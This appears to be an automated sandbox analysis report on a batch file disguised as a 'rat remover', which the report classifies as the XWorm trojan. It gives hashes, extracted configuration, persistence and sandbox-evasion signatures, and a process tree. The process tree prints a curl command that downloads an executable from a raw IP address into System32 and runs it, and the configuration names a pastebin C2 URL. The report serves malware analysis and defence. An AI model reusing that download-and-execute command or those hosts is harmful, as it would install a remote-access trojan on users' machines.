Analysis
-
max time kernel
113s -
max time network
119s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 19:48
Static task
static1
Behavioral task
behavioral1
Sample
rat remover.bat
Resource
win7-20240903-en
windows7-x64
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
rat remover.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
18 signatures
150 seconds
General
-
Target
rat remover.bat
-
Size
8KB
-
MD5
37fa5465a015515ca2d1aec1265e50e2
-
SHA1
c70aab71cac4f51b51e1e9b796dac8d85109442f
-
SHA256
a5f72f5b6a80a798b398d9e0af0d06647ebd7af9d00a38213ec079b59820cad3
-
SHA512
95ac8955274885d368d8d338bd5bd3448bfb2191118258a2c806b550ac3d314f0a7ea2496d1c526ea3341d41ac0f34bdd8431b9e2051cbdc35199a05a3be0356
-
SSDEEP
96:ci4bPeGVlBbGV5FYAUdaIQe/0uscQGZ/nWuPloLe9maMBqeTBKAR4iWPMY+aBUAS:DoW77Shdsusc1l6aVh/y
Score
10/10
Malware Config
Extracted
Family
xworm
Attributes
-
Install_directory
%AppData%
-
install_file
dllhoster.exe
-
pastebin_url
https://pastebin.com/raw/7dw5bmk3
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023cbd-2.dat family_xworm behavioral2/memory/2708-5-0x0000000000F30000-0x0000000000F4A000-memory.dmp family_xworm -
Xworm family
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2708 dllhoster.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhoster = "C:\\Users\\Admin\\AppData\\Roaming\\dllhoster.exe" dllhoster.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 pastebin.com 24 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\dllhoster.exe curl.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 2708 dllhoster.exe 2708 dllhoster.exe 2708 dllhoster.exe 2708 dllhoster.exe 2708 dllhoster.exe 2708 dllhoster.exe 2708 dllhoster.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2708 dllhoster.exe Token: SeDebugPrivilege 1700 taskmgr.exe Token: SeSystemProfilePrivilege 1700 taskmgr.exe Token: SeCreateGlobalPrivilege 1700 taskmgr.exe -
Suspicious use of FindShellTrayWindow 48 IoCs
pid Process 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe 1700 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2708 dllhoster.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 968 wrote to memory of 3508 968 cmd.exe 85 PID 968 wrote to memory of 3508 968 cmd.exe 85 PID 3508 wrote to memory of 4304 3508 net.exe 86 PID 3508 wrote to memory of 4304 3508 net.exe 86 PID 968 wrote to memory of 640 968 cmd.exe 87 PID 968 wrote to memory of 640 968 cmd.exe 87 PID 968 wrote to memory of 2708 968 cmd.exe 88 PID 968 wrote to memory of 2708 968 cmd.exe 88
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat remover.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4304
-
-
-
C:\Windows\system32\curl.execurl -s -o "C:\Windows\system32\dllhoster.exe" "http://185.254.97.159:4823/dllhoster.exe"2⤵
- Drops file in System32 directory
PID:640
-
-
C:\Windows\system32\dllhoster.exe"C:\Windows\system32\dllhoster.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2708
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:3440
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1700
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
76KB
MD589a4f27d32e9c88340099e2a1de430ef
SHA1f4d77ea7d65c769bd571b2c0d1d141f3cfb463fb
SHA25630167c2fb287e4ab79e936cf8aca48d1f776e71648da2f872e5e66f8925b0f48
SHA512fe0aae62e32541122d598b6010c0c5b5537885cd28b1e6906305c546b4530de9e84fd1796b1645e633d7faae9568d060a5abae768eb0c90575aa41643ec83342